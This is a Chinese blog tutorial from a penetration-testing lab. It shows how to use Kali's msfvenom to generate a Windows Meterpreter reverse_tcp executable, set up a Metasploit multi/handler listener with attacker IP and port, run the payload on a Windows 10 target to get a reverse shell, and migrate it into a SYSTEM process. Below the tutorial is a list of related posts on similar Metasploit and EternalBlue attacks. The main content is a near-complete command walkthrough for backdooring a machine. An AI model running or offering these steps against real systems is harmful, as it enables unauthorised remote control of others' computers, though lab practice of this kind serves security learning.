Kali使用Metapsloit渗透win10 生成 payload 反弹shell

已于 2023-03-08 16:50:11 修改
阅读量2.1k 收藏 19
点赞数
文章标签: windows linux
于 2022-07-19 10:20:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45908624/article/details/125866532
版权

测试环境

攻击机kali:192.168.154.128

靶机win10:192.168.154.129

实操

1.kali中使用msfvenom生成一个payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=空闲可监听端口 -f exe -o /root/xxxx.exe

 文件生成在设置好的根目录下

 

2.将payload.exe放入目标windows靶机中

 

3.kali  启动msf

msfconsole

  

4. 使用handler侦听模块

use exploit/multi/handler  

 

5.在侦听模块中加入payload

set payload windows/meterpreter/reverse_tcp  

 6.set LHOST 攻击机IP   侦听主机

set lhost 192.168.154.128

7.set LPORT 攻击机开放的payload端口  

set lport 8888

  

8.show options   查看设置是否生效

show options

 

9.run或者exploit  开始侦听

 

10.windows端双击payload,反弹一个meterpreter的shell

 11.由于meterpreter的shell比较脆弱,所以要让他变成一个稳定的进程

getuid    #查看payld.exe的进程pid

 

ps     #看看所有进程,找一个有着system的进程 

 

12.将shell移动到PID为3356的taskhostw.exe的进程里

migrate 3356

 

 13.接下来就可以做一些操作,像查看系统信息,路由信息,arp信息等,还可以使用shell命令,获得windows的shell

 

 

 

LZ_KaiHuang
关注
  • 0
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
win10子系统bash安装及导入kali工具
11-24
实现windows10 bash上完成kali工具的使用,方便快捷,不需要虚拟机。 Kali系统工具很强大
python实验一 使用KALI进行MS17_010渗透提权
04-09
华东交通大学网络安全软件开发python实验一
Kali利用msf渗透Windows电脑(超详细)
最新发布
jennycisp的博客
02-27 1386
msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。
Web渗透测试 使用Kali Linux
06-15
使用kali linux做web渗透的经典书籍,外文书籍中文翻译。
kali_linux渗透测试视频教程(10套教程).txt
04-06
10套独家渗透测试视频教程,熟练掌握Kali_Linuxmetasploit渗透测试工具及渗透测试实战技巧,另赠送Kali_Linux web渗透测试实战教材一套,metasploit渗透测试魔鬼训练营教材一套。
渗透之——Metasploit Win10提权
冰河的专栏
01-16 1万+
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86515785 1.查看目标主机的操作系统 a) X86操作系统 kali# msfvnom –p payload/windows/meterpreter/reverse_tcp b) X64操作系统 kali# msfvnom –p payload/windows...
Kali Linux-Metasploit入侵Windows10系统
冷色调的夏天的博客
08-01 2万+
Kali Linux-Metasploit入侵Windows10 写在前文 距离上一次写KALI黑客攻防的博文已是去年这个时候了 之所以再次动手写这类的文章一是因为兴趣,二是看到网上五花八门的文章都是复制粘贴过来的,而且并没有写的很清楚,因此就有了本篇博客的出现 免责声明 切勿根据本文做违法之事,如做违法之事皆于博主本人无关! 实验环境 以下环境可以是两台真实物理机,也可以是一台物理机安装虚拟机 上述两种情况我均已尝试成功,由于在一台电脑上写博文较为方便 因此之后的截图是在一台物理机上的。 KALI:(攻
2021-05-07 使用metasploit(MSF) 和 木马 入侵win10 虚拟机
White_give_boy的博客
05-07 1267
使用metasploit(MSF) 和 木马 入侵win10 0x01 实验环境 攻击机:kali linux ip:192.168.171.128 目标机:windows 10 家庭普通版 ip:物理主机 0x02配置msf 1.开启数据库服务 service postgresql start 2.初始化数据库 msfdb init 3.进入msf 4. 加载模块,显示参数 5. 修改参数 LHOST为攻击机ip,LPORT为监听端口 6.开始监...
【kail】使用Metasploit 渗透Windows10
爪白白的个人博客
12-14 6809
一、在Kali Linux生成被控端(msfvenom命令) 第一步:下面我们用msfvenom命令使用反向远程控制程序“windows/meterpreter/reverse_tcp”。该软件执行时自动连接IP“192.168.43.77”,连接的端口为“5000”,生成的文件为payload.exe,在/root目录下 msfvenom -p windows/meterpreter/re...
Kali Linux渗透测试--windows 10入侵和提权过程
热门推荐
无崖子的博客
08-21 3万+
在进行入侵检测之前,配置好网络环境,使其相互连通,才能进行入侵。在使用Metasploit成功入侵之后拿到的只是一个基础的shell,要想拿到系统级别的shell,添加系统用户,获取用户登录口令,还需要进一步提权。 一、Metasploitwindows 10入侵测试 环境
metasploit(永恒之蓝 2017 第10号漏洞)攻击windows操作系统
weixin_73592765的博客
08-02 126
( payload是攻击载荷,就是攻击后的行动,这里是想获取meterpreter)(meterpreter是metaspoit后渗透神器)set LPORT 12345(LPORT为listen port,代表在kaili上即将开启的端口,1-65535随便选,但不能被占用)set LHOST 192.168.1.136(LHOSTS是listen host,是kali的IP地址)使用sudo su命令,并输入kali的密码kali,切换至root用户。使用模块->配置模块必选项 ->运行模块。
Metasploit超详细安装及使用教程(图文版)
hack0919的博客
05-27 4889
本文主要以Kali Linux为主。因为Kali Linux预装了 Metasploit框架和运行在框架上的其他第三方工具
入侵win10(下)--渗透系统
systemino的博客
05-25 4027
攻击者在远程私有服务器上配置完metasploit,创建了自动化资源脚本和生成了简单地payload之后,只要能够物理接触他人的电脑几分钟,他就可以远程控制别人的电脑了,即使电脑已关机也无济于事。 如果你还不太明白,请务必参考我的上一篇文章:设置live USB和payload USB。不然,你可能会有些蒙圈,不知道我下面会说到的两个USB从何而来。 完成上一篇文章中的一系列操作之后,这篇文章...
渗透测试之Win10 如何下载、安装Metasploit-framework6.2
玩人工智能的辣条哥的博客
10-07 1321
Win 10专业版DELL5493 笔记本。
【2023最新版】超详细Metasploit安装保姆级教程,Metasploit渗透测试使用,看完这一篇就够了_
ZL_1618的博客
09-08 562
Metasploit是一个渗透测试框架,可以帮助您发现和利用漏洞。Metasploit还为您提供了一个开发平台,您可以编写自己的安全工具或利用代码。今天,我将指导您了解如何使用Metasploit的基础知识:如何安装Metasploit使用框架以及利用漏洞。
利用kaliWindows进行msf渗透(详细介绍)
2302_78587828的博客
09-17 1595
msfencode.是用来生成后门的软件。MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。msfvenom支持多种操作系统和架构,包括WindowsLinux、macOS以及各种CPU架构。它可以生成各种类型的恶意软件,如反向连接和绑定Shell、Meterpreter反弹Shell、恶意文档、木马等。
kali攻击命令大全_利用msf攻击win10
weixin_35513543的博客
11-27 1万+
攻击环境:攻击者系统:虚拟机下kali linux靶机系统:win10(需要打开Easy File Sharing服务)攻击者ip:10.3.134.27靶机ip:10.3.37.56攻击者和靶机在同一个wifi下,保证在同一网段里,能互相ping通。漏洞利用:EsayFileSharing注意点: 攻击者的虚拟机网络模式应选择桥接模式。准备工作完成,可以开始内网渗透之旅了。step-1首先我们先...
【MSFconsole进阶】Payload(攻击载荷模块):payload分类、相关命令、使用方法
05-24 6359
渗透工具】MSFconsole进阶:Payload(攻击载荷模块)
永恒之黑渗透win10
yy1024iy的博客
05-30 1898
这篇文章介绍了一种名为永恒之黑的高级网络攻击工具,它利用微软Windows系统漏洞实现远程控制、篡改和窃取数据。文章详细描述了在攻击Win10计算机中使用永恒之黑的操作步骤。与常规渗透攻击相比,永恒之黑更加难以防御,这也让用户在保护自己计算机安全时需要更重视网络安全并定期更新系统和软件。
kali永恒之蓝渗透win8
04-28
针对Win8系统的渗透测试,可以使用Kali Linux中的永恒之蓝(EternalBlue)漏洞进行攻击。以下是一些步骤: 1. 首先,需要在Kali Linux中安装Metasploit框架,Metasploit是一款渗透测试工具,可以用来探测和利用漏洞。 2. 接着,使用Metasploit框架中的“eternalblue_doublepulsar”模块,该模块可以利用永恒之蓝漏洞攻击Win8系统。 3. 在攻击之前,需要获取Win8系统的IP地址,可以使用nmap等端口扫描工具进行扫描获取。 4. 利用Metasploit框架中的“eternalblue_doublepulsar”模块,输入Win8系统的IP地址,然后开始攻击。 5. 如果攻击成功,可以获取Win8系统的权限,并且可以执行命令,比如获取敏感信息、远程控制系统等。 需要注意的是,进行渗透测试需要遵守法律法规,严禁对未授权的系统进行攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值